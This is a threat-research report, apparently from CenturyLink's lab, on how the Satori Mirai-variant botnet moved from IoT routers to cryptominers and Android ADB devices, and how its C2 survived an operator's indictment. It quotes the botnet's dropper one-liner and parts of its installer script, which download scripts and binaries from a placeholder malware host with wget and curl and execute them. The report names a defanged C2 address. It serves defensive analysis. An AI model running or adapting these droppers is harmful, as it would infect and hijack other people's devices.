The Resilient Satori Botnet
The Mirai malware began its life as a weapon in turf wars between feuding video game server operators. In the two years since it debuted, it has seen heavy adoption as a general DDoS attack platform around the world. Although Mirai was not the first malware to be used to perform DDoS attacks on the internet, it has become popular because it provides an approachable and scalable framework for establishing a large botnet of internet-connected devices with potent attack mechanisms. It has been used to orchestrate some of the largest volumetric attacks on record and cause substantive damage. As is often true with malware, modifications and additions to the original products have continued since its release. This is evident today in the many forms of Mirai variants that demonstrate broad changes in how they manage their infrastructure and conduct attacks. One of the more prolific examples of this is the Satori botnet, also known as Mirai Okiru. This botnet has evolved multiple times to include infecting non-Internet of Things (IoT) devices and stealing cryptocurrency, all while continuing to launch DDoS attacks.
In the early days of Mirai, the botnet relied on simple brute force authentication attacks on open Telnet ports to spread. However, newer variants have added specific exploits to increase the variety and number of devices they can attack. Satori, is similar to many other Mirai variants in that once a machine is infected with the bot software, it can be used to scan for new victims based upon the exploits it is designed to use.
In late 2017, Satori was infecting IoT devices using specific exploits for port TCP/37215 on Huawei routers (CVE-2017-17215) and port TCP/52869 on Realtek SDK devices (CVE-2014-8361) for the ultimate purpose of performing DDoS attacks. However, there has been a subtle shift away from the typical IoT technologies targeted by Satori in recent months.
In January 2018, researchers noted that Satori was starting to add capabilities to exploit Claymore cryptocurrency miners in addition to the traditional IoT exploits it had used in late 2017. In this attack, an infected Satori bot scans for Claymore cryptocurrency miners on port TCP/3333, which is the management interface. By default, this interface did not have authentication enabled. Once a Claymore mining machine was found, it hijacked the miner’s wallet address to point to the Satori operator’s wallet by modifying the miner configuration file, thus stealing the mined currency that the rig produces. The miner machines were not directly infected with the Satori bot malware, providing only cryptocurrency theft and no increase in the botnet’s size or DDoS power. In May, this behavior continued, with a number of researchers noting that Satori was exploiting cryptominers aggressively. This attack leveraged CVE-208-1000049, which was very similar in the approach described by researchers in January.
As can be seen below, CenturyLink Threat Research Labs identifies a large number of scanners looking for systems with port 3333 open starting on about May 11:
IPs Scanning for Port TCP/3333
In addition, monitoring traffic with destination port TCP/3333 on our backbone network showed a large spike of total Internet traffic at about 2.2 times previous traffic levels seen during the first five months of the year.
This migration away from traditional IoT targets to other hardware types continued. In July, attack analysis by CenturyLink Threat Research Labs found Satori bots attempting to infect Android devices with Android Debug Bridge (ADB) enabled on port TCP/5555. The ADB service is an Android capability, typically disabled by default, which is used by developers or support personnel to access advanced Android OS features.
The following chart shows a significant traffic spike in July on CenturyLink’s backbone network with destination port TCP/5555. Although we can’t attribute all this traffic to Satori, the increase does coincide with timing of the known Satori attacks.
The infection process for this attack is described below to gain a better understanding of what is happening. Mirai variants such as Satori enter hosts either through weak credentials or exploits and then download lightweight scripts to quickly execute commands on the host to install the full malware payload. Analysis of steps used on Android devices shows a similar set of commands to what is used on other platforms.
|cd /data/local/tmp/; busybox wget http://<MALWAREHOST>/adbs -O -> adbs; sh adbs; curl http://<MALWAREHOST>/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2|
Figure 1: Installation Script Download
In the more recent Satori dropper samples, the payload grabbed by the dropper is just a shell script that then downloads and attempts to execute bot binaries for a number of various CPU architectures. Given the range of architectures, it would appear that the target is not just Android phones, but also appliances running Android OS.
pm uninstall $1
cp /system/bin/sh .b
busybox wget http://$http_server/$1 -O -> .b
chmod 777 .b
# Uninstall mining software
Satori Malware Installation Script
Following execution of the bot binary, which unsurprisingly begins scanning port TCP/5555 to infect other devices, the script then runs a clean-up process which removes an application under the ID “com.ufo.miner”, as shown above. This is a competing malware installation, a variant of the ADM.miner cryptocurrency miner known to exploit Android phones. This is followed by cleaning up and removing the installation script from the device. However, the Satori bot malware that was installed is still running on the device.
The targeting of Android devices is a relatively new spin, but the technique used to attack ADB leverages similar methods of operation as previous Mirai variants, and points to the actors heavily reusing earlier code. It also highlights a trend with many actors over the last year in leveraging new exploits to infect additional devices and services that were not targeted previously. As different bot operators compete to recruit devices, it becomes difficult to increase the size of the network beyond a given point without new exploits. Based upon recent history, it should be anticipated that future vulnerabilities will be used in new versions of the malware to allow these operators to grow their capabilities.
For example, researchers at Palo Alto’s Unit 42 recently reported that some Mirai samples have been found to be actively exploiting CVE-2017-5638 (an Apache Struts vulnerability). This exploit could allow the botnet to target devices at enterprises rather than traditional consumer-based IoT devices. In addition, Gafgyt was recently seen to be using an exploit against unpatched versions of SonicWall’s Global Management System (GMS), versions 8.1 and earlier (CVE-2018-9866). Again, this could allow a Gafgyt operator to target new classes of devices, thus increasing the scope of a given botnet.
In late August, CenturyLink Threat Research Labs was monitoring the Satori C2 at 66.42.57[.]45 (domain name 4eouhp79tl5zqs2tbqee[.]ukrainianhorseriding[.]com). This botnet was demonstrating the typical behavior associated with this variant by focusing scanning activity on port TCP/5555 (ADB). On August 30, the number of TCP connections from the bots to the C2 dropped by more than 99 percent, eventually registering zero by September 9. This was just days after the news broke that the actor rumored to be responsible for the Satori botnet was indicted. It was logical to assume that this shift in operation of the botnet was due to the botnet control infrastructure being shut down as a result of this legal action.
However, in mid-September, we started to see indications that the C2 was reactivated. In parallel, the TCP bot traffic to the C2 IP started to increase steadily, indicating that the network was re-activating.
After identifying hosts which were scanning the Internet on port TCP/5555, we could confirm that they were indeed largely from the same infected device pool that existed before the shutdown.
It is interesting to look at the IP space that is connecting to this C2. On September 25, CenturyLink Threat Research Labs monitored approximately 9,900 unique IP addresses making TCP connections to the control port (port TCP/7000) of the C2 IP. The approximate breakdown of countries where the devices making connections to the C2 were located:
In addition, the hosts involved in this botnet were very concentrated to a small number of networks, and strongly suggests a high concentration of Android devices. CenturyLink has initiated notifications to these network providers to assist in cleaning up this infection in order to impact the botnet’s ability to operate.
If there is anything we should take away from the nature and severity of the attacks over the last two years, it is that manufacturers and service providers share a responsibility to ensure that the ecosystem they help create is designed to defend itself. The state of the internet, and the services it provides, are dependent upon an environment where devices are both well managed and capable of being maintained, especially when vulnerabilities are found. Systems must be designed with security in mind and issues must be fixed immediately as they are identified. In addition, default configurations should be set to minimize the vectors that can be used to attack these devices when deployed. Many botnet infections start with simple default passwords or unnecessary open ports to services that the typical user doesn’t require.
Finally, it is interesting that the Satori botnet appears to have survived the arrest of one its operators. CenturyLink is committed to mitigating these actors over our backbone network, and has deployed mitigations to protect our customers and network from this threat. We welcome support from the broader internet community to assist in these efforts.